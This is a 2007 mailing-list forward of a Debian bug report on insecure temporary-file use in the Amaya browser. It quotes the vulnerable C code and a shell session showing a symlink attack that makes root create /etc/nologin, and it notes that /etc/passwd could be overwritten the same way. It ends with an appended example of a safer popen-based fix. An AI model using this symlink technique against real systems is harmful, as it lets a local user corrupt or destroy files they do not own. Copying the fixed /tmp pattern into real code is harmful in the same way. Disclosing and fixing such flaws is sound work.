
[Fwd: Bug#431600: amaya: Insecure use of temporary files allows arbitrary file truncation/creation]

From: Regis Boudin <regis@boudin.name>
Date: Thu, 5 Jul 2007 14:33:08 +0100 (BST)
Message-ID: <45614.195.224.154.166.1183642388.squirrel@mail.imalip.net>
To: www-amaya@w3.org

Hi,

I've been notified of this bug by Steve Kemp, who is running a security
audit of the source code in the Debian archive. I'm very busy at the
moment so I don't have time to provide a patch to go with it, but I will be
happy to give some help if you need it.

Thanks,

Regis

---------------------------- Original Message ----------------------------
Subject: Bug#431600: amaya: Insecure use of temporary files allows
arbitrary file truncation/creation
From:    "Steve Kemp" <skx@debian.org>
Date:    Tue, July 3, 2007 19:42
To:      "Debian Bug Tracking System" <submit@bugs.debian.org>
--------------------------------------------------------------------------

Package: amaya
Version: 9.54~dfsg.0-1
Severity: important


  The Amaya package contains the following code inside
 amaya-9.51/Amaya/thotlib/unicode/ustring.c

        {
          int  fd;
          char buffer[256];
          memset ( buffer, 0, 256 );
          /* ask the system using locale command */
          system ("locale -ck LC_MESSAGES | grep messages-codeset | sed 's/.*=\"//' | sed 's/\"//' > /tmp/locale");
          fd = open ("/tmp/locale", O_RDONLY);


  This can be abused to allow arbitrary files to be created, or truncated,
 when a user runs the browser, as this session shows:

  # check there are no files, then create an evil symlink
skx@vain:~$ ls -l /etc/nologin /tmp/locale
ls: /etc/nologin: No such file or directory
ls: /tmp/locale: No such file or directory
skx@vain:~$ ln -s /etc/nologin /tmp/locale

 # wait for root to run the application
skx@vain:~$ sudo -s
root@vain:~# amaya

 # see the file
root@vain:~# ls /etc/nologin
/etc/nologin
root@vain:~# cat /etc/nologin
UTF-8

  Obviously this example relies upon root to run the application, and linking
 to /etc/passwd would trash the system.

  I guess the solution is to generate a secure temporary filename with
 mktemp, mkstemp, or similar.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-xen (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages amaya depends on:
ii  amaya-data              9.54~dfsg.0-1    Web Browser, HTML Editor and Testb
ii  libc6                   2.5-11           GNU C Library: Shared libraries
ii  libexpat1               1.95.8-3.4       XML parsing C library - runtime li
ii  libfreetype6            2.2.1-6          FreeType 2 font engine, shared lib
ii  libgcc1                 1:4.2-20070627-1 GCC support library
ii  libgl1-mesa-glx [libgl1 6.5.2-5          A free implementation of the OpenG
ii  libglu1-mesa [libglu1]  6.5.2-5          The OpenGL utility library (GLU)
ii  libjpeg62               6b-13            The Independent JPEG Group's JPEG
ii  libpng12-0              1.2.15~beta5-2   PNG library - runtime
ii  libraptor1              1.4.15-3         Raptor RDF parser and serializer l
ii  libstdc++6              4.2-20070627-1   The GNU Standard C++ Library v3
ii  libwww-ssl0             5.4.0-11         The W3C-WWW library (SSL support)
ii  libwxbase2.6-0          2.6.3.2.1.5      wxBase library (runtime) - non-GUI
ii  libwxgtk2.6-0           2.6.3.2.1.5      wxWidgets Cross-platform C++ GUI t
ii  ttf-freefont            20060501cvs-12   Freefont Serif, Sans and Mono True
ii  zlib1g                  1:1.2.3.3.dfsg-3 compression library - runtime

Versions of packages amaya recommends:
pn  amaya-doc                     <none>     (no description available)

-- no debconf information

Steve
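As an added example (not Amaya's code and not part of the bug report above), this is the same codeset lookup with the shared /tmp/locale file removed entirely: the output of `locale -ck LC_MESSAGES` is read through popen() and the grep/sed post-processing is done in C, so no file is ever created at a predictable path. The function names extract_codeset and read_locale_codeset are my own, and the second one assumes a POSIX system with the `locale` command installed.

```c
/* Added example, not Amaya's code: fetch the messages codeset without a
 * temporary file. The command's stdout is read via popen(), so nothing is
 * written to a path that another user could have pre-created. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Parse one "locale -ck LC_MESSAGES" output line, e.g.
 *   messages-codeset="UTF-8"
 * into out with the quotes stripped. Returns 1 on a match, 0 otherwise. */
static int extract_codeset(const char *line, char *out, size_t outlen)
{
  const char *key = "messages-codeset=";
  const char *p, *end;
  size_t len;

  if (strncmp(line, key, strlen(key)) != 0)
    return 0;
  p = line + strlen(key);
  if (*p == '"')
    p++;
  end = p + strcspn(p, "\"\n");   /* stop at the closing quote or newline */
  len = (size_t)(end - p);
  if (len == 0 || len >= outlen)  /* empty value, or it would not fit */
    return 0;
  memcpy(out, p, len);
  out[len] = '\0';
  return 1;
}

/* Ask the system for the codeset, reading the command's stdout directly.
 * Returns 1 on success; out is set to "" when nothing usable was found. */
static int read_locale_codeset(char *out, size_t outlen)
{
  char line[256];
  int found = 0;
  FILE *p;

  if (outlen == 0)
    return 0;
  out[0] = '\0';
  p = popen("locale -ck LC_MESSAGES", "r");
  if (p == NULL)
    return 0;
  while (!found && fgets(line, sizeof line, p) != NULL)
    found = extract_codeset(line, out, outlen);
  pclose(p);
  return found;
}
```

Where a file on disk really is needed, mkstemp() opens its unique name with O_CREAT|O_EXCL and mode 0600, so a symlink planted at that path makes the open fail instead of being followed.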
Received on Thursday, 5 July 2007 13:33:19 UTC
